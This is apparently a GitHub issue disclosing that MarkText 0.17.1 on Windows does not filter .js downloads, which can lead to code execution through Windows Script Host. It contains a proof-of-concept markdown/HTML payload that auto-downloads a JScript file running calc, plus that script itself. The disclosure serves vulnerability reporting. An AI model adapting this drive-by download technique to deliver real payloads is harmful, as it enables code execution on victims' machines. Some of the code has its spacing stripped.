Although marktext filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.
<!-- auto download !--><html><script>varblob=newBlob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});vara=document.createElement('a');a.href=window.URL.createObjectURL(blob);a.download='poc.js';a.click();</script></html><!-- click to download !--><ahref="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>
poc.js
varWshShell=newActiveXObject("WScript.Shell");varret=WshShell.run("calc");if(ret==0)WScript.Echo("You were hacked.")WScript.Quit();
The text was updated successfully, but these errors were encountered:
liyansong2018
changed the title
Typora on Windows doesn't filter WSH JScript, which may cause code execution
MarkText on Windows doesn't filter WSH JScript, which may cause code execution
Feb 9, 2023
Description
Although marktext filters most dangeruos suffix, it still retains the
.jsfile which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.Version: 0.17.1(latest)
Attachment
poc.md
poc.html
poc.js
The text was updated successfully, but these errors were encountered: